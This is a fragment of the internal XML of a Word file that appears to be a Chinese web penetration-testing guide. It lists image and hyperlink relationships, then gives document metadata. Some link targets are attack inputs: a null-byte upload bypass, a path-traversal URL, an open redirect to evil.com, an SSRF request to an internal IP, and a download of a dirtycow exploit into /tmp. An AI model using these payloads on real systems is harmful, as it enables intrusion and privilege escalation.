Target="media/image17.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxx.com/1.jpg%00" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://link.jianshu.com?t=https:/zh.wikipedia.org/wiki/%E5%9B%BD%E5%AE%B6%E5%9C%B0%E5%8C%BA%E4%BB%A3%E7%A0%81" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.t00ls.net/Penetration-articles.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stool.chinaz.com/same" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.panduoduo.net/" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GerbenJavado/LinkFinder" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&amp;num=1" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xz.aliyun.com/t/2657" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shmilylty/OneForAll" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toolbar.netcraft.com/site_report?url=" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yunsee.cn/" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bbs.ichunqiu.com/thread-54849-1-1.html" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/qq_32727277/article/details/102717231" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/215182.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bgp.he.net/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ipip.net/dns.php" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wepcc.com/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.panduoduo.net/" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GerbenJavado/LinkFinder" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xz.aliyun.com/t/2460" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli-labs-master/Less-8/?id=1" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.landgrey.me/redirect.php?url=http://www.landgrey.me.www.evil.com/untrust.html" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/qq_36119192/article/details/9987166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maurosoria/dirsearch" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=95&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bilibili.com/video/av88459896?from=search&amp;seid=1256370126901058159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ns.bufferover.run/dns?q=.baidu.com" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shmilylty/OneForAll" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/3xp10it/xcdn" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toolbar.netcraft.com/site_report?url=" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whatweb.net/" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/zhaijiahui/p/8459661.html" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wenku.baidu.com/view/4e9554740740be1e640e9a0f.html" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lagou.com/lgeduarticle/38721.html" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://j0k3r.top/2018/01/30/file-upload/" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.chaitin.cn/gopher-attack-surfaces/" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.seebug.org/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.51cto.com/wt7315/1863177" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secpulse.com/archives/35877.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bgp.he.net/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whois.chinaz.com/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dns.bufferover.run/dns?q=.baidu.com" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wepcc.com/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lingfengyun.com/" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EnableSecurity/wafw00f" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.anantest.com:8086/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/maurosoria/dirsearch" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.&#20027;&#26426;&#21517;" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli-labs-master/Less-8/?id=1" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bilibili.com/video/av33026520/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github.com/lijiejie/subDomainsBrute" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toolbar.netcraft.com/site_report?url=" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whatweb.bugscaner.com/look" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/cnjava/archive/2012/06/13/2547524.html" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/188464.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qichacha.com/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/3xp10it/xcdn" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xz.aliyun.com/t/6594" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dwz.date/abNg" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.k0rz3n.com/2018/11/20/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8B%20PHP%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/badmoonc/article/details/82289252" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/flokz/p/ssrf.html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whois.bugscaner.com/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asm.ca.com/en/ping.php" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ichunqiu.com/battalion?t=2&amp;r=54399" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dns.bufferover.run/dns?q=.baidu.com" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/robertdavidgraham/masscan" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Threezh1/JSFinder" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EnableSecurity/wafw00f" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/AuFeng111/-/blob/master/sql.txt" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.uedbox.com/post/10853/" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thief.one/2017/04/10/2/" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/192063.html" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/201790.html" TargetMode="External"/><Relationship Id="rId18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s://bbs.ichunqiu.com/thread-35887-1-1.html?from=beef" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.10.143/ssrf.php?url=http://192.168.0.116:80" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lijiejie/subDomainsBrute" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whatweb.bugscaner.com/look" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dwz.date/abNh" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mp.weixin.qq.com/s/VMnU-PttVurV-bswtDd0xg" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aizhan.com/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asm.ca.com/en/ping.php" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zoomeye.org/" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ekultek/WhatWaf" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/icez/p/Mysql-Order-By-Injection-Summary.html" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.gif"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anquanke.com/post/id/93878" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=Windows&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.t00ls.net/articles-46165.html" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/FireFart/dirtycow" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aboul3la/Sublist3r" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/7kbstorm/7kbscan-WebPathBrute" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anquanke.com/post/id/156911" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ekultek/WhatWaf" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://1.1.1.1/../../../../dir/file.txt" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/-chenxs/p/11749367.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aizhan.com/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ipip.net/dns.php" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fofa.so/" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/qing123/p/6771858.html" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/7kbstorm/7kbscan-WebPathBrute" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=2K&amp;tn=SE_PcZhidaonwhc_ngpagmjz&amp;rsv_dl=gh_pc_zhidao" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/huanghelouzi/article/details/82995313" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.99/dirty.c%20-O%20/tmp/dirty.c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github.com/aboul3la/Sublist3r" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zone.secevery.com/article/1065" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shuimugan.com/" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freeerror.org/d/461" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.dyboy.cn/websecurity/16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6715-86CF-47D9-B089-D79C1126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5</TotalTime>
  <Pages>61</Pages>
  <Words>6931</Words>
  <Characters>39509</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>329</Lines>
  <Paragraphs>92</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4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u feng</cp:lastModifiedBy>
  <cp:revision>160</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-12T14:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-17T01:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>